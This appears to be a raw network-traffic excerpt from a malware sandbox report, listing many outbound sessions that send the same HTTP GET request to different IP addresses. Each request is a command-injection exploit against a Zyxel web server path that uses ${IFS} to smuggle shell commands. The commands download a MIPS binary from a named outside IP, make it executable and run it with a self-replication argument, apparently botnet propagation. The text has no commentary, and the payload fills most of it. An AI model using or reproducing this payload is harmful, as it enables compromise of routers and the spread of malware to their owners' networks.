                                                        Feb 2, 2024 06:20:56.655320883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1082192.168.2.1434334175.206.60.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655369997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1083192.168.2.1437024158.167.153.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655400038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1084192.168.2.1446982111.191.176.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655442953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1085192.168.2.1438710220.58.53.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655497074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1086192.168.2.1459280201.209.223.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655536890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1087192.168.2.1446090217.228.61.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655582905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1088192.168.2.145439831.201.208.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655587912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1089192.168.2.145763299.187.213.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655637026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1090192.168.2.144520891.15.218.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655675888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1091192.168.2.145348218.207.84.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655709982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1092192.168.2.144659492.115.216.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655757904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1093192.168.2.144494219.172.14.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655781031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1094192.168.2.1437844198.145.26.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655812025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1095192.168.2.1458288207.205.157.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655867100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1096192.168.2.145967853.176.185.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655900002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1097192.168.2.1439158122.13.233.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655947924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1098192.168.2.1446102144.215.150.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655993938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1099192.168.2.1448872115.68.133.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656008959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1100192.168.2.1439610207.152.45.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656091928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1101192.168.2.1454816100.25.235.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656111956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1102192.168.2.1436472104.190.54.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656162977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1103192.168.2.145570041.252.144.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656203032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1104192.168.2.1446840122.246.15.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656248093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1105192.168.2.144806295.228.216.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656295061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1106192.168.2.144135664.142.209.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656327963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1107192.168.2.1436468179.193.43.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656356096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1108192.168.2.1437222138.172.202.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656388044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1109192.168.2.1442342120.232.118.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656407118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1110192.168.2.1446146193.96.227.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656476021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1111192.168.2.14601702.113.182.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656513929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1112192.168.2.144916499.181.60.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656542063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1113192.168.2.1438758120.150.164.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656585932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1114192.168.2.1456900185.171.114.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656636953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1115192.168.2.1455002221.177.22.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656651974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1116192.168.2.1437796158.218.66.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656704903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1117192.168.2.1441296120.146.244.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656742096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1118192.168.2.1453836144.52.207.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656769037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1119192.168.2.144216837.46.5.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656800032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1120192.168.2.1442196112.94.111.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656856060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1121192.168.2.145573025.67.94.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656883001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1122192.168.2.145199881.55.32.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656909943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1123192.168.2.1440088184.60.230.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656958103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1124192.168.2.1433196167.39.10.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.656987906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1125192.168.2.145859457.51.29.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657032967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1126192.168.2.143367491.46.237.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657067060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1127192.168.2.1453236138.156.157.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657103062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1128192.168.2.1443770103.240.15.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657135963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1129192.168.2.1455816168.54.215.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657200098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1130192.168.2.145399223.94.206.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657241106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1131192.168.2.145082044.103.57.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657284975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1132192.168.2.1437554210.14.156.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657320976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1133192.168.2.1450920124.127.234.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657349110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1134192.168.2.1432810213.116.200.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657387018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1135192.168.2.145982685.180.69.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657422066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1136192.168.2.144779298.180.175.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657490969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1137192.168.2.1438742198.10.195.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657512903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1138192.168.2.144995861.24.108.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657547951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1139192.168.2.1457284203.71.52.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657596111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1140192.168.2.1442468183.1.99.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657638073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1141192.168.2.144451462.62.201.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657660961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1142192.168.2.143448082.248.115.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657697916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1143192.168.2.1441404180.99.190.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657718897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1144192.168.2.1451766106.48.231.222443
                                                        TimestampBytes transferredDirectionData
